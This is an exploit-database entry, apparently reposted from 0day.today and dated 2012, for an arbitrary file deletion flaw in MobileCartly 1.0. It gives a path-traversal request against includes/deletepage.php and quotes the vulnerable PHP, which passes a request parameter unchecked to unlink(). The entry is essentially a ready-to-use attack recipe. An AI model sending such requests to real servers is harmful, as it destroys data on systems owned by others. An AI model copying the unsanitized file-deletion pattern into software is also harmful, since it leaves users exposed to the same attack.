id: 19159
date: 08/09/2012
title: MobileCartly 1.0 Arbitrary File Deletion Vulnerability
author: GoLd_M
cves: 

# Exploit Title: MobileCartly 1.0 <= Arbitrary Delete Vulnerability
# Date: 09/08/2012
# Author: GoLd_M
# Vendor or Software Link: http://mobilecartly.com/mobilecartly.zip
# Version: 1.0
# Category:: Arbitrary Delete Vulnerability
# Google dork: :(
# Tested on: Xp SP 2
# Ex :  [MobileCartly 1.0]/includes/deletepage.php?deletepage=../[File]
# Code Page /includes/deletepage.php
# <?
#
# $page = "../pages/" . $_REQUEST['deletepage']; <<---XXX
#
# unlink($page); <<---XXX[Booooom]
#
#
# ?>



#  0day.today [2023-03-22]  #